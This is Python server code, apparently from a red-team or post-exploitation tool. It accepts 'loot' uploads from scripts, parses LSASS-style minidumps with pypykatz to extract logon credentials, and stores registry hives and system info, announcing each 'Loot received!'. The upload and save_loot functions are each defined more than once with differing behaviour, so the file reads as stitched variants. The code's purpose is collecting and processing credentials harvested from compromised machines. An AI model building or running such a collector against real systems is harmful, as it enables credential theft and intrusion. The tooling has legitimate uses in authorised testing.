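def upload():
    """Upload one or more files.

    Reads every part of the multipart field ``file[]``.  Two query
    parameters steer the handling:

    * ``script`` - when present, the payload is forwarded to
      ``save_loot``/``save_file`` with ``encrypted=True`` and the response
      is a bare ``('OK', 200)`` instead of a redirect.  Note that a request
      parameter, not the payload itself, decides the ``encrypted`` flag.
    * ``loot`` - when present and non-empty, each file is stored as loot for
      that id and ``decrypt_hive`` runs once afterwards; otherwise files go
      to the file exchange.

    Returns:
        A redirect to the current URL as soon as a part with an empty
        filename is seen (parts processed before it are kept),
        ``('OK', 200)`` for script uploads, else a redirect to
        ``/fileexchange``.
    """
    file_list = request.files.getlist("file[]")
    is_from_script = "script" in request.args
    # None when the parameter is absent; an empty value counts as "no loot".
    loot_id = request.args.get("loot")
    for file in file_list:
        if file.filename == '':
            return redirect(request.url)
        if file:
            if loot_id:
                log.info("Loot received - %s", loot_id)
                save_loot(file, loot_id, encrypted=is_from_script)
            else:
                log.info("File received - %s", file.filename)
                save_file(file, encrypted=is_from_script)
    if loot_id:
        # loot_id is bound before the loop, so an empty file_list combined
        # with ?loot= no longer raises UnboundLocalError here.
        decrypt_hive(loot_id)
        push_notification("reload", "Update Loot", "")
    else:
        push_notification("reload", "Update Fileexchange", "")
    if is_from_script:
        return ('OK', 200)
    return redirect('/fileexchange')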
def process_file(file, loot_id, is_from_script, remote_addr):
    """Save the file or the loot and return a message for push notification.

    Args:
        file: the uploaded file object; ``file.filename`` is echoed into the
            notification body.
        loot_id: loot identifier; falsy means a plain file-exchange upload.
        is_from_script: forwarded as ``encrypted=`` to the save helpers.
        remote_addr: client address, echoed into the notification body.

    Returns:
        ``{}`` for a plain file upload.  For loot, a dict with ``title``,
        ``body`` and ``category`` (``"success"`` or ``"danger"``); failures
        in ``save_loot``/``decrypt_hive`` are logged and reported in the
        message instead of propagating.  Exceptions from ``save_file`` in
        the plain-upload path are not caught here.
    """
    if not loot_id:
        log.info("File received - %s" % file.filename)
        save_file(file, encrypted=is_from_script)
        return {}

    log.info("Loot received - %s" % loot_id)
    try:
        save_loot(file, loot_id, encrypted=is_from_script)
        decrypt_hive(loot_id)
    except Exception as e:
        log.exception(e)
        return {
            'title': "Error while processing loot",
            'body': str(e),
            'category': "danger",
        }
    # NOTE(review): filename and address are client-controlled; if the
    # notification consumer renders this body as HTML it must escape it.
    body = "%s from %s has been stored." % (file.filename, remote_addr)
    return {
        'title': "Loot received!",
        'body': body,
        'category': "success",
    }
def upload():
    """Upload one or more files.

    Each part of the multipart field ``file[]`` is handed to ``save_file``.
    A part with an empty filename stops the loop and redirects back to the
    current URL; parts handled before it have already been saved.  Falsy
    parts are skipped.

    Returns:
        A redirect to ``request.url`` on an empty filename, otherwise a
        redirect to ``/fileexchange``.
    """
    for part in request.files.getlist("file[]"):
        if part.filename == '':
            return redirect(request.url)
        if not part:
            continue
        save_file(part)
    return redirect('/fileexchange')
def upload():
    """Upload one or more files.

    Each part of the multipart field ``file[]`` is handed to ``save_file``;
    falsy parts are skipped.  A part with an empty filename stops the loop
    and redirects to the current URL before any notification is sent.
    After a full pass a ``reload`` push notification is emitted.

    Returns:
        A redirect to ``request.url`` on an empty filename; otherwise
        ``('OK', 200)`` when the ``noredirect`` query parameter is present,
        else a redirect to ``/fileexchange``.
    """
    wants_plain_ok = "noredirect" in request.args
    for part in request.files.getlist("file[]"):
        if part.filename == '':
            return redirect(request.url)
        if not part:
            continue
        save_file(part)
    push_notification("reload", "Update Fileexchange", "")
    return ('OK', 200) if wants_plain_ok else redirect('/fileexchange')
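def save_loot(file, loot_id, encrypted=False):
    """Process the loot file.

    The upload is persisted under ``LOOT_DIR`` via ``save_file`` and the
    stored path is classified by ``get_loot_type``, then dispatched:

    * ``"DMP"`` - parsed with pypykatz (imported lazily so the rest of the
      application does not depend on it); each logon session is round-
      tripped through ``to_json()`` and stored via ``store_minidump``.
    * ``"SYSINFO"`` - handed to ``add_sysinfo``.
    * anything else - treated as a registry hive and handed to ``add_hive``.

    Args:
        file: the uploaded file object, passed through to ``save_file``.
        loot_id: identifier of the loot collection the file belongs to.
        encrypted: forwarded unchanged to ``save_file``.

    Raises:
        ImportError: when a minidump arrives and pypykatz is not installed.
        Anything raised by ``save_file``, the parser or the store helpers;
        nothing is caught here, so a malformed upload surfaces to the caller.
    """
    filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
    loot_type = get_loot_type(filename)
    log.debug("Saving %s [%s]", filename, loot_type)
    if loot_type == "DMP":
        # Optional heavy dependency: only imported when a minidump arrives.
        from pypykatz.pypykatz import pypykatz
        # The file is uploaded content handed to a third-party parser;
        # parse errors propagate rather than being swallowed.
        mimi = pypykatz.parse_minidump_file(filename)
        creds = [json.loads(v.to_json()) for v in mimi.logon_sessions.values()]
        store_minidump(loot_id, json.dumps(creds), filename)
    elif loot_type == "SYSINFO":
        add_sysinfo(loot_id, filename)
    else:  # registry hive
        add_hive(loot_id, loot_type, filename)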
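def save_loot(file, loot_id, encrypted=False):
    """Process the loot file.

    The upload is persisted under ``LOOT_DIR`` via ``save_file`` and the
    stored path is classified by ``get_loot_type``, then dispatched:

    * ``"DMP"`` - parsed with pypykatz (imported lazily so the rest of the
      application does not depend on it); each logon session is round-
      tripped through ``to_json()`` and stored via ``store_minidump``.
    * ``"SYSINFO"`` - handed to ``add_sysinfo``.
    * anything else - treated as a registry hive and handed to ``add_hive``.

    Args:
        file: the uploaded file object, passed through to ``save_file``.
        loot_id: identifier of the loot collection the file belongs to.
        encrypted: forwarded unchanged to ``save_file``.

    Raises:
        Anything raised by ``save_file``, the parser or the store helpers
        except ``ImportError``.  An ``ImportError`` (typically pypykatz
        missing) is logged and swallowed, so the function returns normally
        and callers cannot tell that the loot was not processed.
    """
    filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
    loot_type = get_loot_type(filename)
    try:
        if loot_type == "DMP":
            # Optional heavy dependency: only imported when a minidump arrives.
            from pypykatz.pypykatz import pypykatz
            # The file is uploaded content handed to a third-party parser;
            # only ImportError is handled below, parse errors propagate.
            mimi = pypykatz.parse_minidump_file(filename)
            creds = [
                json.loads(v.to_json())
                for v in mimi.logon_sessions.values()
            ]
            store_minidump(loot_id, json.dumps(creds), filename)
        elif loot_type == "SYSINFO":
            add_sysinfo(loot_id, filename)
        else:  # registry hive
            add_hive(loot_id, loot_type, filename)
    except ImportError as e:
        log.error("You have unmet dependencies, loot could not be processed")
        log.exception(e)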